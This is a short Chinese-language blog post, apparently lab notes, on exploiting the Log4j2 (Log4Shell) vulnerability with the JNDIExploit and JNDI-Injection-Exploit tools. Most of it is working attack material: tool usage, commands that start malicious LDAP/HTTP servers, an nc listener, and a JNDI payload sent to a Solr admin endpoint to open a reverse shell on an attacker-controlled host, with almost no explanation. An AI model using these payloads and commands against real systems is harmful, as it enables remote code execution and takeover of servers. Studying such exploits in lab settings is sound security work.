log4j2漏洞

log4j2漏洞

Posted by Kyon-H on September 18, 2024

漏洞介绍

JNDIExploit使用

0x727/JNDIExploit: 一款用于JNDI注入利用的工具

参考:JNDIExploit使用 - FreeBuf网络安全行业门户

1
2
3
4
5
6
7
Usage: java -jar JNDIExploit.jar [options]
Options:
* -i, --ip Local ip address
-l, --ldapPort Ldap bind port (default: 1389)
-p, --httpPort Http bind port (default: 8080)
-u, --usage Show usage (default: false)
-h, --help Show this help
1
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 6666 -i 192.168.242.4

开启监听

1
nc -lvvp 10010
1
2
3
4
## poc
${jndi:ldap://192.168.242.4:8888/Basic/ReverseShell/192.168.242.4/10010}

http://your-ip/solr/admin/cores?action=${jndi:ldap://192.168.242.4:8888/Basic/ReverseShell/192.168.242.4/10010}

JNDI-Injection-Exploit 使用

sayers522/JNDI-Injection-Exploit: JNDI命令注入利用

编译

1
mvn clean package -DskipTests

命令:

1
2
3
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /System/Applications/Calendar.app" -A 127.0.0.1